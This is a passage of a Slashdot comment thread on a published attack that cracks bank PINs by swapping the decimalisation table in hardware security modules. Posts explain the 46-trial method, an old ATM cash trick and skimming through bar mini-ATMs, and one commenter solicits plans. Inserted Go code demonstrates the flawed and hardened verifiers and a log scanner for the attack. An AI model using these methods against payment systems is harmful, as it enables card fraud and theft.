      Embarrassingly, I've done it myself twice when carrying out other transactions that don't require you to take the card before completion (such as statements and deposits). Luckily I work for the bank, so they don't cut my card in half :-)

      --
      When I am king, you will be first against the wall.
    7. Re:An old vulnerability by Rob+Parkhill · · Score: 1

      Another classic:

      Stick in card, punch in digits to withdraw a few hundred dollars. When the money is spit out, carefully take the middle bills, leaving the top and bottom ones (often different denominations). Wait. ATM will pull the cash back in, thinking you walked away and forgot to take it. Your account is credited for the full amount.

      No, this doesn't work anymore!

      --
      "Tomorrow's forecast: a few sprinkles of genius with a chance of doom!" - Stewie Griffin
    8. Re:An old vulnerability by weblogger · · Score: 1

      Here in Portugal, at least, if the person doesn't pick up the card within a few seconds, the machine takes it back, just like the money. If the money was already taken and not pulled back by the machine, then the account is debited; even if the person didn't take the card, the account is still debited for the transaction.

  69. A bit of background by tarquin_fim_bim · · Score: 2, Informative

    Link to the court case is at the Inquirer.

  70. Re:My Days in the Show by Anonymous Coward · · Score: 0

    Hats off to you, sir! Light up a stogie and lean back and enjoy the good life and all the fruits concomitant thereto.

    YOU HAVE ARRIVED.

  71. Why bother doing a cryptographic attack by Anonymous Coward · · Score: 0

    when you can steal the whole machine?

    (As far as I know, they still haven't caught all the guys responsible for these.)

  72. Posting Anon by Anonymous Coward · · Score: 0

    Not too long ago, I was a building inspector. One of the main types of buildings that I inspected were FUNB (First Union National Banks) and got to see the inside of how things were run.

    *Every single ATM* machine I saw in use (that would be hundreds) were simply p166s with IBM OS/2 attached. That's it, nothing fancy, nothing sneaky, just a plain PC. After watching how they were updated and the "security" on them, I no longer use ATM machines, and advise those I care about not to either.

  73. Everything Is Under Control by antiprime · · Score: 1

    Scary, huh? Kinda makes you think, doesn't it?

    Ouch, that hurts. Well, let's go shopping.

  74. All your revolution are been co-opted! by Thud457 · · Score: 1
    Tyler Durden now works at CitiBank's ad agency?

    I guess he can be more effective in that position than slumming as a projectionist!

    --

    the preceding comment is my own and in no way reflects the opinion of the Joint Chiefs of Staff

  75. How clever! Reverse karma whore. by Mothra+the+III · · Score: 0, Troll

    In the great /. tradition of saying something fast rather than saying it properly. Nice work!

    --
    Worst. Sig. Ever.
  76. Gag this by Anonymous Coward · · Score: 0

    This research is now posted publicly on my University's web site (univ. of colorado). have a nice day, Citidorks.

  77. huh? by Anonymous Coward · · Score: 0

    do they really think anybody that would do this kind of fraud would really have any trouble getting this info even if it was "gagged"?

  78. My experience with ATM cameras... by bearl · · Score: 5, Funny

    So here's my ATM camera story...

    In 1983, my first job out of college was as an internal auditor at a small regional bank that had only seven branches. We were just installing ATMs and most of our customers were elderly types who weren't interested in these new fangled computers. I, being young and more enlightened, loved them, used them all the time, and rarely carried much cash at all, preferring to just stop by a convenient ATM for a fresh withdrawal. This was in the days when banks considered ATMs as a money saver because customers would use the ATM rather than coming inside to bother a teller, thus saving the bank loads of money by reducing the number of tellers they had to employ, so there were no fees. But I digress...

    One of our older patrons had his ATM card misappropriated by a handyman, family member, or other close associate, and said villain used the card to make several large withdrawals. The customer reported the problem, we told the system to capture the card on the next use, and waited.

    Within a week, the card was used, and captured. The film from the camera was sent off (these days it's probably digital). The ATM company found that either our tellers had been ordering the wrong kind of film for our ATMs, or they had been sending us the wrong kind, or the tellers were installing it wrong, or something. They sent a note with that info to our President, explaining that the photo was probably the wrong person and wouldn't hold up in court, along with the developed photograph.

    Fortunately he read the note before he looked at the photograph, because the guy in the photo was me! He came into my office and with as serious an expression as he could manage, told me they had the photo back, and had their man (I didn't know about the problem with the film at this point). He slid open the envelope, and there in stark black and white was me, probably on a Saturday morning, unshaven and in a dirty Ramones t-shirt.

    I stuttered for a few seconds but he couldn't hold it together and started laughing. Needless to say that photo appeared all over the bank for the next several years, along with signs like "Have you seen this man?" and "Do not serve - notify security." We figured that since I used the ATM so much, I was probably on 85% of the photos on the film. The odds were pretty good that with the indexes being wrong I would come up, but it couldn't have been a worse photograph.

    Oh, eventually the real crook was caught because he came into the bank to complain that the ATM had taken "his" card and the replacement hadn't arrived yet.

    1. Re:My experience with ATM cameras... by Anonymous Coward · · Score: 0

      Love ur story :-) But who was the crook?

  79. Damn. by airrage · · Score: 0, Offtopic

    This was supposed to be an homage to becoming a moderator, and yet in hindsight, given that it's a first post, and there are some thinly-veiled sexual references, I can honestly see how this was not well received.

    ~Airrage.

    --
    "This isn't a study in computer science, it's a study in human behavior"
  80. Choose your own PIN by IanBevan · · Score: 1

    This whole thing about PIN numbers just kills me. In New Zealand, you can walk into a bank branch and (upon supplying ID) get a new bank card and choose your own PIN. The card is totally anonymous so there's no way anybody could perform any kind of cryptographic hash against, for example, the card number embossed on the card (because there isn't one that identifies you) to get the PIN.

    1. Re:Choose your own PIN by Old+Wolf · · Score: 0, Troll

      NZ is also (mostly) immune to these problems because banks don't store PINs. All transactions are done online to one big server which has very tight access controls.

    2. Re:Choose your own PIN by Anonymous Coward · · Score: 0

      Same goes for Sweden. Even happens that the ATM can't contact the bank.

    3. Re:Choose your own PIN by Anonymous Coward · · Score: 0

      If anyone cared to read the paper, they would find that how the PIN is generated (selected by customer or hashed from the account) is irrelevant. So if your New Zealand bank is using DES PIN verification, you're at risk.

      The New Zealand bank I work for uses Visa PVV verification which uses neither Offsets nor Dec Tables so is immune to the crack.

    4. Re:Choose your own PIN by Anonymous Coward · · Score: 0

      What *are* you talking about ?
      One big server ?

      You're right to say that banks don't store PINs. They've never been stored - because that's insecure. To do it properly you send encrypted PIN data to a security box which calculates the PIN, compares it to the customer's attempt and returns a yes or no.

  81. The real issue by SiliconEntity · · Score: 5, Informative
    Few of you have read the document from Citibank. In the first place, it's not even Citibank! It's Diner's Club, and specifically Diner's Club South Africa, which is suing two customers who refuse to make good on supposed ATM withdrawals. (The withdrawals were made in England while the customers were in South Africa.)

    In the second place, the really funny part is that Diner's Club South Africa is trying to force Diner's Club International to produce experts to testify! DCI didn't want to help DCSA to this degree so DCSA is trying to get the courts to force them to help.

    But the main point is that the "gag order" reads as follows:

    The parties, their legal representative and their experts shall keep confidential all information revealed during the examination and such information shall not be used for any purpose other than the purposes of the Proceedings and the parties shall take all steps necessary to keep such information confidential
    This is what Ross Anderson objects to. He agrees that if the DCI experts testify about confidential information regarding the workings of the ATM system, that that should be kept secret. But he doesn't want the secrecy order to be so broad that it would interfere with him and his students publishing data based on publicly available information. He wants to make sure that the secrecy order is drawn to clarify the distinction between information that is available elsewhere and confidential information revealed by the experts.

    So when you look at it this way, it's not at all the black and white issue that is being presented here. Neither Diner's Club nor Citibank is seeking a "gag order" to suppress discussion of vulnerabilities. They just want to make sure that confidential testimony by their experts (information which they are contractually bound to keep confidential based on their relationships with others in the financial community) is kept secret. And the only issue is the technical details of how to draft the secrecy order.

    In short, it's a tempest in a teapot. Move along, folks. There's really nothing to see here.

    1. Re:The real issue by Anonymous Coward · · Score: 0

      Why does citibank, or Diner's Club of the Lost British Empire or whatever, have a system that is vulnerable if people know its workings? Why isn't all security nicely compartmented into specific keys that don't have to be revealed? Why is anyone cooperating with any attempt to force people to pay for a withdrawal done half a world away?

      Tempest in a teapot my ass. One more company to add to the blacklist, along with Intel, Microsoft, SBC, Verizon, WorldCom, etc, etc, etc . . . soon I will be reduced to only doing business with Amish virgins, and they have precious little use for my elite assembly coding skills.

    2. Re:The real issue by Twylite · · Score: 1
      Why does (anyone) have a system that is vulnerable if people know its workings?

      Because the system has been in place for years, since before many aspects of security were well researched, and is in the process of being replaced; a process which is taking 8 to 12 years, as a result of the huge global dependency on existing financial networks.

      Why isn't all security nicely compartmented into specific keys that don't have to be revealed?

      It is. Read the paper. This is an attack that exploits vulnerabilities in the use of the cryptography and keys.

      Why is anyone cooperating with any attempt to force people to pay for a withdrawal done half a world away ?

      Because the financial institution in question is accusing the person of committing fraud against the bank by exploiting weaknesses in the system.

      Banks have known for some time that weaknesses exist. The problem is that changing financial standards involves global coordination and huge cost. Most banks are still using single DES to protect transactions because of this inertia.

      The intent in keeping quiet about these vulnerabilities is not to cause mass hysteria and to limit the abuse of the vulnerabilities. As seen in many recent security reports (e.g. "hacking" a master key for locks) secrecy/obscurity does not guarantee security, but it does limit damage, at least in the short term.

      Banks are actively working on improving security, a process which will see EMV being supported from next year (in most nations), and which will drag through until 2012 before magstripe cards are completely replaced. In the meantime, one can hardly expect them to publish exploits for all weaknesses that they cannot fix without breaking the global financial network!

      --
      i-name =twylite [http://public.xdi.org/=twylite], see idcommons.net
  82. Another ATM pin crack in the news today!! by goombah99 · · Score: 1, Redundant

    The Register reports that Mike Bond and Piotr Zielinski have detailed how any ATM programmer (bank, repairman, etc.) insider can crack any ATM PIN in just 15 guesses. Banks use a hardware encryption scheme to avoid having a crackable password-like file. Oops... turns out there's a hole in the hardware design. Direct link to download the pdf paper.

    Here is how the crack works. First you have to understand how the PIN is generated.

    Banks had two problems they needed to solve. First, an ATM had to be able to verify a card even if it went off-line from the bank computers. Thus, to allow for on-the-spot verification, the PIN has to be derivable from the card somehow. Second, they also did not want to endure the security risk of having to distribute a list of all PIN numbers of all cards to all machines, even if it was encrypted.

    So the scheme they came up with is: they take your PIN number and DES encrypt it, and the first four digits of the encrypted number becomes your base PIN. Then, to allow you to change your PIN, they permit an offset number. Since knowing this offset number does not tell anyone the base PIN, these offset numbers can be kept in the public domain and distributed worldwide.

    Thus when you type in your "PIN" number to an ATM, the sequence of steps is: the machine reads the account code off the mag stripe, DES encodes it, grabs the first four numbers, adds your public offset, and compares it to the number you typed in at the keypad.

    To keep everything secure the entire process is done in hardware. So even a privileged bank employee could not have access to the encrypted account code and thus learn the PIN.

    But wait, there's just one teeny tiny extra step I omitted that causes all the problems. When you DES encode something you get back a HEX number, and since PINs are decimal you have to convert it to a decimal number. There's lots of ways you could do this, but what is done is simply to have a table that maps the 15 hex digits 0...F many-to-one down to 0...9.

    Again, still no problem if this mapping had been done in hardware. Unfortunately, it was not viewed as a security risk and this mapping table is not fixed but is rather a software input to the hardware unit. Anyone with access to the hardware device, such as a privileged bank employee or a repairman, or someone who found one at a salvage yard, can send a substitute table to the hardware. And that's where the problem lies.

    The paper gives several crack approaches, one of which takes 15 tries maximum and is not easily explained in a few words. They also give a simpler approach that takes a maximum of 46 steps to get the PIN, which I'll explain.

    First, change the many-to-one mapping to all zeros, except for 1 digit. Say this digit is a 3. Then type in a trial PIN of 0000. The hardware unit will say this PIN is a correct match unless the encrypted account number happens to have a 3 anywhere in it (all others get mapped to zero). Next change the map to all zeros, except for, say, the digit 4, and repeat. After trying all ten digits, you now know which digits are in the PIN number. Now you just try all permutations of these. Worst case is a total of 36+10=46 trials.

    Their other algorithm is more efficient (only 15 trials maximum), but you get the idea.

    I note that this is a big problem for the banks. The reason is that it would not simply do to replace the hardware units with ones that have a fixed map table. The PINs are crackable by anyone who still has one of the old hardware units. To fix the system they would have to both change all of the ATM hardware, change the DES salt in the hardware (to render old machines useless), and change everyone's PINs. This would all have to be done simultaneously, world wide, in every ATM, for the banking system's ATMs not to stop working for customers.

    Alternatively, I guess they could upgrade all the hardware slowly if they were willing to leave the crack in place until they finished. To do this they would have to have two sets of offsets: one for the new machines and one for the old machines. The cards would remain crackable until the last machine was removed and the users changed their PIN numbers.

    I note that in a real system it only takes about 5000 tries on average to crack a 4-digit PIN. However, the hardware units limit the rate of trials, so that reducing the number of trials by a couple of orders of magnitude is significant.

    --
    Some drink at the fountain of knowledge. Others just gargle.
  83. Who has access? by barryfandango · · Score: 2, Interesting

    From reading the article it would seem that the only people who could pull off something like this are "Bank Programmers," but there's a much bigger security hole that I can think of.

    Here in Canada we have non-bank ATM machines proliferating across the countryside - it's basically a machine that performs an Interac (debit) transaction and spits out money. It runs over a telephone line, you can buy one for a few thousand dollars, and you plonk it down in the middle of a bar where people are too drunk to care that you're adding $2.00 to every transaction.

    But who are the people making these machines? They have no certification that I'm aware of. I've seen at least a dozen varieties of these "mini-ATMs" from companies whose names I have never heard of. It seems to me that it would be very easy to build a few of these, rent them to bar owners or corner stores (also very common) and just log magnetic strips and PINs till the cows come home. What does the guy who owns the corner store know about security? He'll just be glad that he has an alternative in his store to offering debit himself, which costs him money on every transaction.

    So anyway, if anybody has some plans or examples of how to build your own Interac-ATM please post them on the net ASAP and let's talk business.

    --
    In all matters of opinion, our adversaries are insane. -Oscar Wilde
    1. Re:Who has access? by Anonymous Coward · · Score: 0

      >They have no certification that I'm aware of.

      That's because you're a dumbass that hasn't contacted Interac to ask them the question (or even see -- it might be on their website). They have strong requirements (come on, the big banks wouldn't be that stupid).

  84. A second ATM PIN crack in NEWS today by goombah99 · · Score: 5, Informative

    oops...posting with the correct formatting this time:
    The Register reports that Mike Bond and Piotr Zielinski have detailed how any ATM programmer (bank, repairman, etc.) insider can crack any ATM PIN in just 15 guesses. Banks use a hardware encryption scheme to avoid having a crackable password-like file. Oops... turns out there's a hole in the hardware design. Direct link to download the pdf paper.

    Here is how the crack works.

    First you have to understand how the PIN is generated.

    Banks had two problems they needed to solve. First, an ATM had to be able to verify a card even if it went off-line from the bank computers. Thus, to allow for on-the-spot verification, the PIN has to be derivable from the card somehow. Second, they also did not want to endure the security risk of having to distribute a list of all PIN numbers of all cards to all machines, even if it was encrypted.

    So the scheme they came up with is: they take your PIN number and DES encrypt it, and the first four digits of the encrypted number becomes your base PIN. Then, to allow you to change your PIN, they permit an offset number. Since knowing this offset number does not tell anyone the base PIN, these offset numbers can be kept in the public domain and distributed worldwide.

    Thus when you type in your "PIN" number to an ATM, the sequence of steps is: the machine reads the account code off the mag stripe, DES encodes it, grabs the first four numbers, adds your public offset, and compares it to the number you typed in at the keypad.

    To keep everything secure the entire process is done in hardware. So even a privileged bank employee could not have access to the encrypted account code and thus learn the PIN.

    But wait, there's just one teeny tiny extra step I omitted that causes all the problems. When you DES encode something you get back a HEX number, and since PINs are decimal you have to convert it to a decimal number. There's lots of ways you could do this, but what is done is simply to have a table that maps the 15 hex digits 0...F many-to-one down to 0...9.

    Again, still no problem if this mapping had been done in hardware. Unfortunately, it was not viewed as a security risk and this mapping table is not fixed but is rather a software input to the hardware unit. Anyone with access to the hardware device, such as a privileged bank employee or a repairman, or someone who found one at a salvage yard, can send a substitute table to the hardware. And that's where the problem lies.

    The paper gives several crack approaches, one of which takes 15 tries maximum and is not easily explained in a few words. They also give a simpler approach that takes a maximum of 46 steps to get the PIN, which I'll explain.

    First, change the many-to-one mapping to all zeros, except for 1 digit. Say this digit is a 3. Then type in a trial PIN of 0000. The hardware unit will say this PIN is a correct match unless the encrypted account number happens to have a 3 anywhere in it (all others get mapped to zero). Next change the map to all zeros, except for, say, the digit 4, and repeat. After trying all ten digits, you now know which digits are in the PIN number. Now you just try all permutations of these. Worst case is a total of 36+10=46 trials.

    Their other algorithm is more efficient (only 15 trials maximum), but you get the idea.

    I note that this is a big problem for the banks. The reason is that it would not simply do to replace the hardware units with ones that have a fixed map table. The PINs are crackable by anyone who still has one of the old hardware units. To fix the system they would have to both change all of the ATM hardware, change the DES salt in the hardware (to render old machines useless), and change everyone's PINs. This would all have to be done simultaneously, world wide, in every ATM, for the banking system's ATMs not to stop working for customers. Alternatively, I guess they could upgrade all the hardware slowly if they were willing to leave the crack in place until they finished. To do this they would have to have two sets of offsets: one for the new machines and one for the old machines. The cards would remain crackable until the last machine was removed and the users changed their PIN numbers.

    I note that in a real system it only takes about 5000 tries on average to crack a 4-digit PIN. However, the hardware units limit the rate of trials, so that reducing the number of trials by a couple of orders of magnitude is significant.

    --
    Some drink at the fountain of knowledge. Others just gargle.
    1. Re:A second ATM PIN crack in NEWS today by NudeZiggy · · Score: 1

      That's strange, especially considering I picked my pin (not from a list) and it has nothing to do with my card number.

      -nz

    2. Re:A second ATM PIN crack in NEWS today by Anonymous Coward · · Score: 0
      That's strange, especially considering I picked my pin (not from a list) and it has nothing to do with my card number.

      You only thought you picked your PIN. The way it works is you have a permanent PIN that is locked to your account number. When you pick a new PIN, all that happens is they assign a public offset number between the real PIN and the one you think is your PIN. The actual PIN stays the same and is derived from the account number.

      read the post you replied to or read Bond's article.

    3. Re:A second ATM PIN crack in NEWS today by Old+Wolf · · Score: 1

      Actually it does. Under the scheme discussed in the article (used by some organizations but not all), they calculate a PIN for you, and when you specify your PIN they store the calculated value and the difference between the two (in clear text). So it seems to you as if you have chosen your own PIN.

    4. Re:A second ATM PIN crack in NEWS today by danb35 · · Score: 1

      You know, I thought of this yesterday when I read this story on k5 too, but didn't bother posting there:

      With at least one of my ATM cards, I can call my bank and change the PIN over the phone. With the scheme described in these articles, that shouldn't be possible, as a different PIN would have a different offset from the "natural" PIN, which new offset would need to be written to the card. How does it work?

    5. Re:A second ATM PIN crack in NEWS today by tknorris · · Score: 1
      any ATM programmer (bank, repairman, etc..) insider can crack any ATM PIN in just 15 guesses.

      I haven't been able to read the actual paper yet (link is slashdotted) to see if it contains more information than the post but I fail to see why you have to be an insider to perform these attacks.

      Why couldn't your average cracker build any one of the many card readers from schematics found nearly anywhere on the internet. Then somehow gain access to someone's bank card (there are any number of social engineering ways to achieve this...use your imagination). Scan the card with the card reader, and store the result. Next, write software that performs the same algorithm in software that the ATM machines are executing in hardware. (i.e. supply an entered PIN, subtract the known offset, DES encrypt the result, compare the encrypted result with the encrypted base PIN from the card, start over.) This would allow the cracker to avoid any lockout issues with trying too many PINs and give the cracker plenty of time alone to perform the attack.

      What am I missing here?

    6. Re:A second ATM PIN crack in NEWS today by NudeZiggy · · Score: 1

      Ooh, thanks for clarifying it. I guess I got distracted by all the hex stuff and thought they meant that the offset could only be 0-F, like that thing about needing only 15 (16) tries to break it.

    7. Re:A second ATM PIN crack in NEWS today by Anonymous Coward · · Score: 1, Insightful

      I haven't been able to read the actual paper yet (link is slashdotted) to see if it contains more information than the post but I fail to see why you have to be an insider to perform these attacks.

      Because you don't have the DES keys stored on the secure hardware device. I came to read comments hoping to gain some knowledge on the specifics of this attack by maybe reading some posts by slashdotters who work in the field, but I had once again overestimated the collective IQ of this assumption happy crowd. sigh..

    8. Re:A second ATM PIN crack in NEWS today by Anonymous Coward · · Score: 0

      The offset is not only on the card, but also in the bank's computers. When you would try to use your PIN on an offline machine, it would still be the old one that is valid. Once you visit an online machine, it gets your new offset from the central systems and writes it back to the card.
      (this only happens in machines that gobble-up the card and return it to you, not in the small desktop units that you swipe your card through manually)

    9. Re:A second ATM PIN crack in NEWS today by Anonymous Coward · · Score: 0

      The ATM doesn't verify the PIN, so the offset is only needed on the card if the bank allows other ATM networks to verify your PIN. Your bank obviously doesn't.

      Goombah's original post made the mistake of assuming that the Hardware devices being talked about are in the ATM - they aren't, they're at the bank.

      Having said that, changing the PIN over the phone is still a pretty crappy way of doing things.

    10. Re:A second ATM PIN crack in NEWS today by Anonymous Coward · · Score: 0

      Read that paper carefully - the hardware units it talks about are not in the ATMs, they're at the banks themselves. So forget about any ATM repairman getting hold of an old one. ATMs don't verify PINs (in a civilised society anyway).

      The crack only works for programmers who have access to the hardware devices. Probably reasonably easy to do where security isn't the greatest or the geeks are friendly with the ops.
      But if you have that sort of access to run programs, you can probably bypass the software checking for more than 3 tries or whatever, so you may as well do a brute force attack - remember a 4 digit PIN can only have 10,000 combinations. That security leak has always been there. No attacks from North Korea on the NY subway yet !

      Keep feeling the fear guys...

    11. Re:A second ATM PIN crack in NEWS today by Twylite · · Score: 1

      This comment is a little off base. To begin with, banking networks do not use "on the spot verification". There are a limited number of hardware cryptography modules in a banking system that have the capability and correct keys to perform PIN verification.

      When you enter a PIN at an ATM, it is encrypted using a key that is specific to that ATM. The PIN is transmitted through various networks to reach the back-end verification system; at each change point between networks the PIN is reencrypted under a different key.

      The use of an account number in PIN creation binds the PIN to the account number, so that you cannot take an encrypted PIN for one account (say, yours) and use it to access another account by fiddling with the magstripe.

      In fact it is your account number that is encrypted to produce the PIN (as the first four digits); while the verification process sees the PIN encrypted under a DIFFERENT key and transmitted to the verification system where it can be checked. The ATM does not verify your PIN!

      The paper describes an approach that, if you have API-level access to a verification hardware module AND an encrypted PIN corresponding to a known account number, will establish the PIN in on average 15 guesses.

      To reword the last paragraph: if you are a bank employee with access to the most trusted parts of their network, and can sniff that network as well as submit requests, you may be able to perform this attack. Even then, many banks use serial-attached hardware modules, which means you will have to hack the bank's "mainframe" to stage this attack.

      In other words, you cannot perform this attack with access to old ATM hardware or most hardware on the financial network. And banks have very strict procedures for disposing of old security hardware. And very strict procedures for gaining access to their most secure systems.

      ATMs would not have to be replaced. The decimalisation table is not used by the ATMs ... only the verification system. Locking these tables down in the hardware would prevent this attack (specifically), but there are others that can still be used.

      Aside: some people don't believe that ATMs don't verify PINs. They do; it seems really quick because they often allow you to get on with your business while the verification is performed in the background. Simple proof that this is the case: (1) an offline ATM won't allow you to perform a transaction; (2) in order to verify a PIN you need the same DES key that was used to generate the PIN ... so either all banks and PINs in the world use the same key, or an ATM that was deployed before some new bank started operating wouldn't be able to accept cards/PINs from that bank (as it wouldn't have the bank's secret PIN key). Ummm ... no.

      Since there are a limited number of verification systems for each bank, a solution would be to have an out-of-band mechanism to permit only specific, approved decimalisation tables to be used in each system. This limits or prevents the attack by preventing unfettered modification of the table, but does not involve any changes to hardware "in the field" or to customer PINs. In effect, a change to the hardware used in the verification process to lock the decimalisation table(s) to predefined values on a per-installation basis would be sufficient (from the paper: "To regain full security, the decimalisation table input must be cryptographically protected so that only authorised tables can be used." [my emphasis]).

      --
      i-name =twylite [http://public.xdi.org/=twylite], see idcommons.net
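The IBM 3624 scheme as the parent post and Twylite describe it (natural PIN from a DES encryption of the account number, a decimalisation table, a clear-text offset), with the flawed caller-supplied-table verifier beside one that honours only cryptographically authorised tables, which is what the paper's quoted recommendation asks for. This is an added example in Go, not code from the paper, the thread or any bank's HSM; the PIN generation key, account number, table-authorisation key and BCD packing are constructed for the demonstration.

```go
package main

import (
	"crypto/des"
	"crypto/hmac"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"strings"
)

const (
	StandardTable = "0123456789012345" // IBM 3624 default: 0-9 unchanged, A-F wrap to 0-5
	ZeroTable     = "0000000000000000" // the degenerate table the thread describes
)

var pinGenKey = []byte{0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF} // constructed sample key
var tableAuthKey = []byte("constructed-table-authorisation-key")            // constructed; never given to verification callers

// decimalise maps every hex digit of s through the 16-entry table.
func decimalise(s, table string) (string, error) {
	if len(table) != 16 {
		return "", fmt.Errorf("decimalisation table must have 16 entries")
	}
	var out strings.Builder
	for _, c := range strings.ToUpper(s) {
		i := strings.IndexRune("0123456789ABCDEF", c)
		if i < 0 {
			return "", fmt.Errorf("not a hex digit: %q", c)
		}
		out.WriteByte(table[i])
	}
	return out.String(), nil
}

// NaturalPIN is the IBM 3624 derivation: DES(account number as BCD), hex, decimalise, first four digits.
func NaturalPIN(pan, table string) (string, error) {
	if len(pan) != 16 || strings.Trim(pan, "0123456789") != "" {
		return "", fmt.Errorf("PAN must be 16 decimal digits")
	}
	block, _ := hex.DecodeString(pan) // decimal digits are valid hex, so this packs BCD
	c, _ := des.NewCipher(pinGenKey)  // key is a fixed 8 bytes above, so no error is possible
	enc := make([]byte, des.BlockSize)
	c.Encrypt(enc, block)
	dec, err := decimalise(hex.EncodeToString(enc), table)
	if err != nil {
		return "", err
	}
	return dec[:4], nil
}

// digitwise adds (sign=+1) or subtracts (sign=-1) two 4-digit strings digit by digit, mod 10.
func digitwise(a, b string, sign int) (string, error) {
	if len(a) != 4 || len(b) != 4 || strings.Trim(a+b, "0123456789") != "" {
		return "", fmt.Errorf("PIN and offset must be 4 decimal digits")
	}
	out := make([]byte, 4)
	for i := range out {
		out[i] = byte('0' + (int(a[i]-'0')+sign*int(b[i]-'0')+10)%10)
	}
	return string(out), nil
}

// Offset is chosen minus natural (safe to store in clear, it reveals nothing); AddOffset reverses it.
func Offset(chosen, natural string) (string, error)    { return digitwise(chosen, natural, -1) }
func AddOffset(natural, offset string) (string, error) { return digitwise(natural, offset, +1) }

// VerifyUnlocked is the flawed check the thread describes: the caller supplies the table
// (and the offset) with each request, so ZeroTable turns every natural PIN into 0000.
func VerifyUnlocked(pan, offset, entered, table string) bool {
	nat, err := NaturalPIN(pan, table)
	if err != nil {
		return false
	}
	want, err := AddOffset(nat, offset)
	return err == nil && want == entered
}

// AuthoriseTable is the out-of-band approval token for a table: HMAC-SHA256 under
// tableAuthKey, issued by whoever owns table policy, not by verification callers.
func AuthoriseTable(table string) string {
	m := hmac.New(sha256.New, tableAuthKey)
	m.Write([]byte(table))
	return hex.EncodeToString(m.Sum(nil))
}

// VerifyLocked is the hardened form: a table is honoured only with a valid token.
func VerifyLocked(pan, offset, entered, table, token string) bool {
	return hmac.Equal([]byte(AuthoriseTable(table)), []byte(token)) && VerifyUnlocked(pan, offset, entered, table)
}

func main() {
	pan := "4000123456789010" // constructed account number
	nat, _ := NaturalPIN(pan, StandardTable)
	off, _ := Offset("5555", nat) // the customer chose 5555; only this offset is stored
	fmt.Println("natural", nat, "offset", off, "entered 5555 ok:", VerifyUnlocked(pan, off, "5555", StandardTable))
	fmt.Println("ZeroTable unlocked:", VerifyUnlocked(pan, "0000", "0000", ZeroTable), "locked:", VerifyLocked(pan, "0000", "0000", ZeroTable, ""))
}
```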
    12. Re:A second ATM PIN crack in NEWS today by Anonymous Coward · · Score: 0

      I agree with this statement and the other comments by Twylite. There is a risk being disclosed here that has been around for a long time, and the same risk exists in most forms of cryptography.

      Sure, the proliferation of PIN-use, especially in the US market, increases the potential damage a breach may cause - but the risk has always been there.

      Layered security in back-end bank processes, both physical and technical, is required to lower risk. PIN verification calls to a back-end crypto should be audited. Those with access to the auditing should not have access to the API, and vice-versa. Implementing layered security lowers risk.

      Foolproof security doesn't exist, especially when referring to the trusted few who actually have access to back-end systems. Methods that could be considered totally secure are impractical to be dumped on the general public.

      A bigger risk was mentioned by a Canadian poster, talking about proliferation of PIN-use. People trust it so much that they are willing to whip the ATM card out anywhere and use their PIN - but do you trust every PINPad or Mini-ATM machine at every POS location or grocery checkout ?

      Fraudulently obtaining the PIN and Track2 data at the acquiring source (someone rigging a 20 lane checkout group of PINPads, for example) to me poses a bigger threat than this in the near future. Especially in an age of wireless where the critical data could be transmitted to the crooks in realtime. They could get a chronic number of card data and PIN numbers in a short period of time before it was detected. We have to trust the companies deploying these units.

      There are other PIN verification methods deployed today that don't expose this risk. But then again, when it comes to referencing the privileged individuals there is always some risk.

      We all wish financial institutions could move faster towards new and better security, but those of us in the industry realize just what a tough task this is. Look at the deployment of IC cards in the US market for financial processing - it is almost non existent.

      Daniel Spence
      President
      3Pea Technologies, Inc
      dspence@3pea.com
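An audit pass of the kind Daniel Spence calls for, added here as an example that is not from his company or the thread: it runs over a constructed key=value HSM audit trail (not any vendor's format) and flags PIN_VERIFY calls that use a decimalisation table outside the approved set, plus bursts of verifications against a single account, which is what the table-substitution search described above would leave behind in the log. Written in Go; the log lines, field names and thresholds are all assumptions.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// Alert is one finding from the audit pass.
type Alert struct {
	Kind    string // "unapproved-table" or "verify-burst"
	Account string
	TS      int64
}

// sampleLog is a constructed key=value audit trail for this example; it is not
// any vendor's real HSM log format. One account is queried six times in six
// seconds, each time with a different non-standard decimalisation table.
var sampleLog = []string{
	"ts=1000 op=PIN_VERIFY account=4000111122223333 table=0123456789012345 result=OK",
	"ts=1030 op=KEY_EXPORT account=- table=- result=OK",
	"ts=1100 op=PIN_VERIFY account=4000123456789010 table=0000000000000000 result=OK",
	"ts=1101 op=PIN_VERIFY account=4000123456789010 table=0000000000000001 result=FAIL",
	"ts=1102 op=PIN_VERIFY account=4000123456789010 table=0000000000000002 result=OK",
	"ts=1103 op=PIN_VERIFY account=4000123456789010 table=0000000000000003 result=FAIL",
	"ts=1104 op=PIN_VERIFY account=4000123456789010 table=0000000000000004 result=OK",
	"ts=1105 op=PIN_VERIFY account=4000123456789010 table=0000000000000005 result=OK",
	"ts=1900 op=PIN_VERIFY account=4000111122223333 table=0123456789012345 result=OK",
}

// parseRecord splits a key=value line into a map.
func parseRecord(line string) map[string]string {
	rec := map[string]string{}
	for _, f := range strings.Fields(line) {
		if k, v, ok := strings.Cut(f, "="); ok {
			rec[k] = v
		}
	}
	return rec
}

// AuditPINVerify scans PIN_VERIFY records, in time order, for two signals:
// a decimalisation table that is not on the approved list, and more than
// maxTries verifications of one account within windowSec seconds.
func AuditPINVerify(lines []string, approved map[string]bool, maxTries int, windowSec int64) []Alert {
	var alerts []Alert
	recent := map[string][]int64{} // account -> verification timestamps inside the window
	bursted := map[string]bool{}   // one burst alert per account
	for _, line := range lines {
		rec := parseRecord(line)
		if rec["op"] != "PIN_VERIFY" {
			continue
		}
		ts, err := strconv.ParseInt(rec["ts"], 10, 64)
		if err != nil {
			continue // malformed record; production code would alert on this as well
		}
		acct := rec["account"]
		if !approved[rec["table"]] {
			alerts = append(alerts, Alert{"unapproved-table", acct, ts})
		}
		win := append(recent[acct], ts)
		for len(win) > 0 && win[0] <= ts-windowSec {
			win = win[1:] // drop timestamps that have fallen out of the window
		}
		recent[acct] = win
		if len(win) > maxTries && !bursted[acct] {
			bursted[acct] = true
			alerts = append(alerts, Alert{"verify-burst", acct, ts})
		}
	}
	return alerts
}

func main() {
	approved := map[string]bool{"0123456789012345": true} // the only table policy allows
	for _, a := range AuditPINVerify(sampleLog, approved, 3, 60) {
		fmt.Printf("%-16s account=%s ts=%d\n", a.Kind, a.Account, a.TS)
	}
}
```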

  85. Well, duh... by dasmegabyte · · Score: 1

    How secure can a number that can't be more than 4 digits long BE?

    I hate my pin number. I hate that they won't let me use a longer number like I want to. Jesus, I know Pi out to 50 digits...yet the number that exposes all of my funds (yes, they forced me to have the same pin to link my savings, line of credit and money market accounts) is like the combination to a moron's luggage.

